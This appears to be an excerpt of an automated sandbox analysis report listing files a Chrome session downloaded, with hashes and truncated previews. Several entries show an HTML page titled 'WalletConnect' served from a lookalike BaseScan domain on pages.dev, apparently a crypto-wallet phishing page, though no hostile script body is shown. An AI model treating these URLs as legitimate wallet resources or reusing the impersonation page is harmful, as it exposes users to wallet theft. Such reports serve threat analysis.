                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..@....(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):13360
                                                                                                                                                                                                                                              Entropy (8bit):5.635058839476275
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:9pQGDuD690MPdz8Ui015ll1I57I2Tru6h0hNmHV+m9eIfyAqYfinNVYEUUFJZmUY:9OiT0wz8Uiw/1S7DegkcHpeIuScZbAX
                                                                                                                                                                                                                                              MD5:4FF108E4584780DCE15D610C142C3E62
                                                                                                                                                                                                                                              SHA1:77E4519962E2F6A9FC93342137DBB31C33B76B04
                                                                                                                                                                                                                                              SHA-256:FC7E184BEEDA61BF6427938A84560F52348976BB55E807B224EB53930E97EF6A
                                                                                                                                                                                                                                              SHA-512:D6EEE0FC02205A3422C16AD120CAD8D871563D8FCD4BDE924654EAC5A37026726328F9A47240CF89ED6C9E93BA5F89C833E84E65EEE7DB2B4D7D1B4240DEAEF2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/*.CryptoJS v3.1.2.code.google.com/p/crypto-js.(c) 2009-2013 by Jeff Mott. All rights reserved..code.google.com/p/crypto-js/wiki/License.*/.var CryptoJS=CryptoJS||function(u,p){var d={},l=d.lib={},s=function(){},t=l.Base={extend:function(a){s.prototype=this;var c=new s;a&&c.mixIn(a);c.hasOwnProperty("init")||(c.init=function(){c.$super.init.apply(this,arguments)});c.init.prototype=c;c.$super=this;return c},create:function(){var a=this.extend();a.init.apply(a,arguments);return a},init:function(){},mixIn:function(a){for(var c in a)a.hasOwnProperty(c)&&(this[c]=a[c]);a.hasOwnProperty("toString")&&(this.toString=a.toString)},clone:function(){return this.init.prototype.extend(this)}},.r=l.WordArray=t.extend({init:function(a,c){a=this.words=a||[];this.sigBytes=c!=p?c:4*a.length},toString:function(a){return(a||v).stringify(this)},concat:function(a){var c=this.words,e=a.words,j=this.sigBytes;a=a.sigBytes;this.clamp();if(j%4)for(var k=0;k<a;k++)c[j+k>>>2]|=(e[k>>>2]>>>24-8*(k%4)&255)<<24-8*((j+
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 25004, version 1.524
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):25004
                                                                                                                                                                                                                                              Entropy (8bit):7.991890523359022
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:768:CBjXVN1I3NpXFdWq3GNkhbSJogWsi8tjfYr:AtIfzF3B+RQ
                                                                                                                                                                                                                                              MD5:B793E3D4DA9F14C3B1E8A4893425A5EC
                                                                                                                                                                                                                                              SHA1:DDF4739D5936591F07C0638E2EF0BD69B30044E1
                                                                                                                                                                                                                                              SHA-256:C33F13EEB82A5BCE819773B106BB2F1168502A9ED6D3CDA747AC522D73E65061
                                                                                                                                                                                                                                              SHA-512:7955C2987AC7F5546427ED47BA3C140D2E9BBBD623D19C247F0A3369C148479C59FC2FAE9EE527CCD20C6F8D36B028B3270CAD312219FEA5D0FAC23F78B11014
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/avertastd-extrabold-BtYeKIE6.woff2
                                                                                                                                                                                                                                              Preview:wOF2......a........T..a:.........................l?FFTM..2........`..R.....m..... ....6.$.....P.. ..m..>..1?webf....5lN.b....~....(.......gEM.........Gx.f..7..1A....4Z.V...f..2..\.m1!A...N&.Y .4s.p.CT...}......iz.e.,.'.!.....o\....[.F....n........<.?.*n|..q........s<]`....).E../..g.......E..- .V.......5..Faacr.zgpUY..M...L'X....ma!hc.i"F...V...X8W...w..;.vQ..u..p..Y..{.K..~..F.....*.(.u...`FZ.s.I.t_..e....U#...PIL. 4E...."!. ....,.ybHb%.......n..P(.*$.,.......m..~_o.o......|_..m.[..e.....F...k..QQ.U..-.BETDE.....#w9".3..wZUUw?......M<>.O.i.}.Q.4......kk'...d%91E..G...B..8./.M..<<.~..&8..p....P....S..{......$..i-.....4..U.l.D.I..........C.J,............'h.V...t...f......Fg.6..W...z'.>....C\^..B....9.u.&|0........f.J..S...3.3;I.L/.v.(I.-...w..P........#...M.sh.)..?V..G.Hp..Z....BH.NW..Z2e.U:...w.....b... .x......1.=3...@.......R..@.4.I...8....B.y..j..]c....r..\.=.}.t..]..x/..h7.>t.g...1r.............(..2.A.Y....R:............s.9..#sv..-.@....C...
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2395)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9562
                                                                                                                                                                                                                                              Entropy (8bit):5.071017232434546
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:jiep/uRmNKzej7JsEXfdxbx7x7bX7fcCB1jWIRtD0w:3pmR0KzYzcmww
                                                                                                                                                                                                                                              MD5:4073A2CB091535231AF102FBBBABC018
                                                                                                                                                                                                                                              SHA1:4F1291A93B5435E388C67B3A379AF43CE39DD11B
                                                                                                                                                                                                                                              SHA-256:34F48CAA372038829B9D8B64CBAD1F9F29C5F8CA6ED3B85958C2A78954D06F77
                                                                                                                                                                                                                                              SHA-512:82799234927964F2883DB398027D068DCC3D6CE6DB67E05DF6E2F23159337D46D17AD0C8D4543DFB45FBB5E1EFE5B5BE508D3D19842A8939ED9782477028859D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:;(function($){'use strict';$.HSCore.components.HSUnfold={_baseConfig:{unfoldEvent:'click',unfoldType:'simple',unfoldDuration:300,unfoldEasing:'linear',unfoldAnimationIn:'fadeIn',unfoldAnimationOut:'fadeOut',unfoldHideOnScroll:true,unfoldHideOnBlur:false,unfoldDelay:350,unfoldOpenedElement:'init',afterOpen:function(invoker){},beforeClose:function(invoker){},afterClose:function(invoker){}},_pageCollection:$(),init:function(collection,config){var self;if(!collection||!collection.length)return;self=this;var fieldsQty;collection.each(function(i,el){var $this=$(el),itemConfig;if($this.data('HSUnfold'))return;itemConfig=config&&$.isPlainObject(config)?$.extend(true,{},self._baseConfig,config,$this.data()):$.extend(true,{},self._baseConfig,$this.data());switch(itemConfig.unfoldType){case 'css-animation':$this.data('HSUnfold',new UnfoldCSSAnimation($this,itemConfig));break;case 'jquery-slide':$this.data('HSUnfold',new UnfoldJSlide($this,itemConfig));break;default:$this.data('HSUnfold',new Unfol
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):27794
                                                                                                                                                                                                                                              Entropy (8bit):7.991104032269088
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:384:e39DkPetWRffraTF0JeL/uvgq8/EnU9aZW2LpG5pWjM08zSVN0YZuH:e3ePetOOJxivgr8nU0/cpWjX8iNfG
                                                                                                                                                                                                                                              MD5:6F3445BB27D012CF381AEEE80BEECD8A
                                                                                                                                                                                                                                              SHA1:21149DE377F2DCF0798A1D97F76EA0185F1DF9F1
                                                                                                                                                                                                                                              SHA-256:AB4FC6CEC16D881C893F2B09428B7B4F1D833957B53177A9C03F4FBC423663FF
                                                                                                                                                                                                                                              SHA-512:B185F6854C9AE878102D05A09D9F56A406772427C1A4FA097000A55F46907E16BF0CC6B32AF41A4B2731478848929DF9905EF220AF247FA4D2E2B2115573D42D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/mobile-sigma-africa-2024-DHtlyFtf.png
                                                                                                                                                                                                                                              Preview:RIFF.l..WEBPVP8L}l../.A=.''+.m.z.E..H...../^8{..I.mE.k......o..o......H.$).U....q._...dm......Cj....D..u.Ym.......Xo..pZ..I...DC.G(.!:.....A.......z$!.A.....@...!..B.. .B.j`....I..B$.RG.#.......RQ-zk..k..........Q...............{.......{.].............v.=x..s...w:9.L.yz........o.f.f.fE...Y{2-...(Gn.....t..s.s{mR.Za.%.M.....O.EIaVv0...S[Rp.V.H.eG..D..;-.\..f"....V.......Q..l1...0r..4......=......~..~..~.&.=3....W}..............Y..{G.....rj.."n.w.5.dR...f....M.Bk.(&..dkt.mH..F/....&j3)2...J..$&j........q._>....m.)....=."b..d....}.z...l.u.v.y..M.D).+P.m.v.l.H.;pC9Gj#...$.....Yt......9Z...0....E.j.:..G1Bi......i..g{..6.@.ENe.....,::j.bKG..0`..s].zXL.......j.H..ZB...<3...c.j.*.O.Ql..;.1..;c.Cfg..NI..{.>.I...svD.!.m.H....L...d......V.Q.4..]n......S........~..G.Q.Yl..b4\..W..'..._...k....Y....tISc...Q@;..O?.m..#.....q......s.s.....#r....bHT...L..C...{..s0.......n..m..&..8........>=9.6..mC.o.".Eq].p.%8#....l.*.......*..:..O......Cb.....!.ED.i
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                                                              Entropy (8bit):4.81880974721583
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQBSgOKHAA9NR1JXXEYftR0lpe5XLrYBSpFYv:Ayx9HAGrXpftR+GqSMv
                                                                                                                                                                                                                                              MD5:20ABA28B5A7232E93A147AA7CF22BBC2
                                                                                                                                                                                                                                              SHA1:DDA6C9793630535E18A8DB337FADDED09023877C
                                                                                                                                                                                                                                              SHA-256:684BF7E6CE1430D7A6CFA900F3B5AABB9F1D66A0DCB55D916065A28E79693E3E
                                                                                                                                                                                                                                              SHA-512:AB2397E34011934CA62C8DCA568580EED8F55924573BD8BFDB3E273EC7ED9A04A9BD5BEC09AEC75662F76E3AE3829716FC61DF5957B9960067C4EC76253A4E49
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/_arrayMap-2bcec0e7.js
                                                                                                                                                                                                                                              Preview:function h(e,u){for(var n=-1,l=e==null?0:e.length,t=Array(l);++n<l;)t[n]=u(e[n],n,e);return t}export{h as a};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/loaderImage.gif
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):14334
                                                                                                                                                                                                                                              Entropy (8bit):7.856184157838413
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:/YNg7/E3NXjUi6Z3YVhlj/4Rh9JK1sbcItCy37d:/YyyIiwYqjK1sDCS
                                                                                                                                                                                                                                              MD5:3764C5E15829B5F19D54452FA564C85F
                                                                                                                                                                                                                                              SHA1:A17AD425F76BFD46E0F89B1B68E49C306941413E
                                                                                                                                                                                                                                              SHA-256:107EFAAE76F54A6253827450CBAEF34CED5472B571512A494F5DD918AE604440
                                                                                                                                                                                                                                              SHA-512:F8E245AE6CCD8F2969FB4261AF81387AE9F3731FEFBA7935D4D66543E99E46DD7F434FA3E280C22BD1531281E228980513862DF3C0CDCA5AE20542A4EEE1984F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/93329c6f8b.png?_v=4&auto=format&dpr=1&w=200
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o..*....(iinf..........infe........av01Color.....iprp....ipco....ispe................pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8334
                                                                                                                                                                                                                                              Entropy (8bit):7.97549245575419
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:kDdDK0KTtIn/ZozBBG/gjM8xsI9IPqFqGQaqoYN8cjq9T0gWZAiXOv:kDNnizBAgjBxHQaqccCT0hhXq
                                                                                                                                                                                                                                              MD5:F85691CF6E60E46DE75A8D8E236A492E
                                                                                                                                                                                                                                              SHA1:8A366FF0406A24EDA5DD39E12B84FABCE71C29F7
                                                                                                                                                                                                                                              SHA-256:039F4695FAA19D8B2A07153DA8D971BCA2AB1E9D3EE78940CF8B712B74160923
                                                                                                                                                                                                                                              SHA-512:8B743AFCC186D463F3C450A35D7C050870D21E6326030ADDD7BDE665199EA4D77C25A1A84BD1A7C936F4E104D516DCD935ACF21DE429E1C4282527CA8AE3BFB9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/vip/badge-platinum.png
                                                                                                                                                                                                                                              Preview:RIFF. ..WEBPVP8Ly ../..F.G.0..6..}R.^.=`wI.r$...h....p...{.G..7.x&...w.Q.G..]8.m.6t.cai.E.8....vr.Q....C$3.M#P7.q... .."....M*.e$!........y...BUB.DH..S@".c@....*.,...b|U.J..h2.....F.2.....}O5.).kZ~.?...?.o........VE1.....{B7...$hL".I.F.........G...I.1. .&......u.......:.aLW......o.8..`....I......[..Riv.vC..s.e.e..)..U...~.Y...o*.....~......^*GA.6R....{ D..p..M....'U.lO..M.`\....d.3._...%O...;..!=Cy.^.....9.....=......v.9..|x...v.Y.5..lm{.8....,[j*...3S.W.s%=+.`.\......y.I/....?EI........... o....0KO.._.t.l.R/3...X....'.1.................:U......H.^._..........=.,......gZN=.z.9.......3..G...cA9..@{!..!.k`.s...rw..r...B.K...ZE........N.,Gm(.S.hr......w..y....DFj.fm...B.....d!6.F..........S>s~}..?gg.)...0Q.&d1..,BR......S.~w.s.!.\..h.&.}..j...!..W..+n.#. ^2..0.....j....jm(...`S......-......M..[...HE.........)..1j..w......R.|@..NDu..^_.%.4*.F.....p...p..I..j..R#...+....3....................3 ...Ee.JV1&".LyZ...Jn...3....?..nC..%.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
